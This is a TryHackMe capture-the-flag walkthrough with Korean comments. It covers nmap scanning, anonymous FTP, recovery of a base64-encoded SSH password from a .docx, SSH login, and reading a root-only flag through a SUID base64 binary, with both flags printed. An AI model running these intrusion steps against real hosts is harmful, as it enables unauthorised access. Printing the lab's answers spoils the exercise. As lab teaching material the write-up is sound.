[redraccoon] ## Catch me if you can ##

TryHackMe | 모의해킹 기초

[Cath Me If You Can]

sudo nmap 10.10.247.147 -sS -T4
----------------------
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
----------------------


sudo nmap 10.10.247.147 -sV -T4 -sC -p 21,22,80
----------------------------------------------------------------------------------
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.61.73
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 1000     1000            0 Mar 12  2023 hiya
|_-rw-r--r--    1 0        0              45 Mar 12  2023 temporary_pw.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 128a28dd913a41fdaf6f3a3c4c43ea5c (RSA)
|   256 ab36d4c2a3438887d0892ebbb2ce0351 (ECDSA)
|_  256 3ae52103c4deb9531ac6a966cbea1f1b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/dev/
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
----------------------------------------------------------------------------------


ftp 10.10.247.147
-------------------
id : anonymous
pw : anonymous
-------------------


ftp > ls -alh
-------------------------------------------------------------------------
drwxrwxr-x    2 1000     1000         4096 Mar 12  2023 .
drwxrwxr-x    2 1000     1000         4096 Mar 12  2023 ..
-rwxrw-r--    1 1000     1000         7173 Mar 12  2023 .ssh_creds.docx
-rw-rw-r--    1 1000     1000            0 Mar 12  2023 hiya
-rw-r--r--    1 0        0              45 Mar 12  2023 temporary_pw.txt
-------------------------------------------------------------------------


# FTP로 연결한 '10.10.247.147'에서 다음 파일을 'kali'로 다운받음
ftp> get .ssh_creds.docx
ftp> get .temporary_pw.txt


# 'kali'에서 확인 
ls -a
----------------------------------------
temporary_pw.txt	.ssh_creds.docx
----------------------------------------


cat temporary_pw.txt
-------------------------------------------- 
Do you see a docx file ? Read the docx file.
--------------------------------------------


# .ssh_creds.docx 읽기(시연영상에서는 이렇게 하는데 전 안됨...)
libreoffice --cat .ssh_creds.docx


# .ssh_creds.docx => output.txt로 파일 변환
pandoc .ssh_creds.docx -t plain -o output.txt


# output.txt 실행
cat output.txt
-------------------------------------------------------------------------
Hey, I created this document for you so you know my name right? That’s
my ssh id.

Encoded password just in case Y2F0Y2htZSFAIw==
-------------------------------------------------------------------------


# 'Y2F0Y2htZSFAIw=='을 base64 디코딩
echo 'Y2F0Y2htZSFAIw==' | base64 -d
-----------
catchme!@#
-----------


# exiftool : 미디어 파일의 메타데이터를 읽을 수 있음
exiftool .ssh_creds.docx   
-------------------------------------------------------------------        
ExifTool Version Number         : 12.57
File Name                       : .ssh_creds.docx
Directory                       : .
File Size                       : 7.2 kB
File Modification Date/Time     : 2023:03:11 21:31:40-05:00
File Access Date/Time           : 2024:02:06 04:02:07-05:00
File Inode Change Date/Time     : 2024:02:06 03:36:16-05:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0808
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x7f431349
Zip Compressed Size             : 360
Zip Uncompressed Size           : 1341
Zip File Name                   : word/numbering.xml
Creator                         : harry
-------------------------------------------------------------------


# 공격 대상 서버로 ssh 접속
ssh harry@10.10.247.147
----------------------
password : catchme!@#
----------------------


sudo find / -name "user.txt" 2>/dev/null
-----------------------------------
/home/harry/backup/user7/user.txt
/home/harry/backup/user16/user.txt
/home/harry/backup/user/user.txt
-----------------------------------


cat /home/harry/backup/user7/user.txt
----------------------
GROOT{C4TCHME_S3CRETS}
----------------------


sudo find / -name "flag.txt" 2>/dev/null
---------------
/root/flag.txt
---------------


# flat.txt 파일은 접근 권한이 없음
cat /root/flag.txt
--------------------------------------
cat: /root/flag.txt: Permission denied
--------------------------------------


# -type f : 일반 파일
# -perm -4000 : 'setuid' 권한이 설정된 파일
find / -type f -perm -4000 -exec ls -h {} \; 2>/dev/null
----------------
/usr/bin/base64
----------------


# SUID 권한이기 때문에 base64 명령어를 사용하면 해당 명령어의 소유자 권한으로 실행하게 됨.
base64 /root/flag.txt
----------------------------------------------------
UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==
----------------------------------------------------


# base65 디코딩
echo "UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==" | base64 -d
------------------------------------
R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==
------------------------------------


# base65 디코딩 한번 더 
echo "R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==" | base64 -d
------------------------
GROOT{C4tCl+lME!fy0Uc4N}
------------------------